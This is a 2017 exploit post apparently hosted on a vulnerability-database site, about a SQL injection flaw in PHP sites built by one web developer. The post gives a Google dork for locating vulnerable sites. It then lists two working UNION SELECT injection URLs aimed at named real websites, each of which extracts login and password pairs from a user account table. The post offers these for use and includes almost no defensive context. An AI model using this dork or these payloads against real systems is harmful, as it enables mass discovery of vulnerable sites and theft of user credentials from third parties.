Dynamicsolution IT SQL injection Vulnerability

2017.02.05
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------| |[+] Exploit Title: Dynamicsolution IT SQL injection Vulnerability |[+] |[+] Google Dork: intext:"Developed By Dynamicsolution IT Soft.Eng. Forhad Alam" inurl:php?id= |[+] |[+] Discovered By: Voldemort799 |[+] |--------------------------------------------------------------| |[+] {DEMO} |[+] |[+] http://rbmsc.edu.bd/nu/details.php?id=9'+UNION+SELECT+1,2,3,group_concat(login,0x3a,password)+from+user_account-_+ |[+] |[+] http://probahacoachingrb.com/details.php?id=5%27+UNION+SELECT+1,2,3,group_concat(login,0x3a,password)+from+user_account--+ |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+]Thanks to : Hack4lx - shayan 72 |[+] voldemort799@gmail.com |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2025, cxsecurity.com

 

Back to Top